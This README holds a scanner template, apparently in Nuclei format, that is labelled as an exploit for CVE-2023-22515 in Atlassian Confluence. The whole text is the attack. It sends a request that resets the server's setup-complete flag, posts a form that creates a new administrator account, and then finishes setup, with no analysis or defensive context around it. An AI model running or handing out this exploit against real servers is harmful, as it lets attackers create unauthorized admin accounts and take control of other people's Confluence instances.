README.md
Rendering markdown...
id: CVE-2023-22515
info:
name: Atlassian Confluence Privelege Escalation Exploit
author: 0xj3seer
severity: critical
requests:
- method: GET
path:
- "{{BaseURL}}/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
headers:
X-Atlassian-Token: no-check
matchers:
- type: status
status:
- 200
- method: POST
path:
- "{{BaseURL}}/setup/setupadministrator.action"
body: 'username=bro&fullName=bro&[email protected]&password=bro&confirm=bro&setup-next-button=Next'
headers:
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
matchers:
- type: status
status:
- 200
- method: POST
path:
- "{{BaseURL}}/setup/finishsetup.action"
body: ''
headers:
X-Atlassian-Token: no-check
matchers:
- type: status
status:
- 200